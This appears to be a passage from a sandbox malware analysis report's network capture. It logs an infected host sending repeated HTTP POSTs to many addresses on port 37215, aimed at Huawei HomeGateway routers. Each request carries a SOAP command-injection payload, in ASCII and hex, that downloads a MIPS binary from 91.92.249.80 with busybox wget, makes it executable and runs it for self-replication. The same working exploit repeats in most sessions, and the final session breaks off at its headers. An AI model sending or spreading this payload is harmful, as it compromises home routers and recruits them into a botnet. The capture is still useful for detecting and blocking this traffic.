                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1801192.168.2.2334468197.204.186.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543643951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1802192.168.2.2343088157.61.255.14337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543931007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1803192.168.2.233426441.158.56.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544064045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1804192.168.2.2343458197.142.79.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544070959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1805192.168.2.2359630197.162.25.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544106007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1806192.168.2.234662885.136.166.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544120073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1807192.168.2.2337956197.35.46.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544120073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1808192.168.2.235663873.194.33.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544127941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1809192.168.2.234223865.58.59.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544802904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1810192.168.2.2342210197.226.14.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.544809103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1811192.168.2.234956899.248.219.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.545767069 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
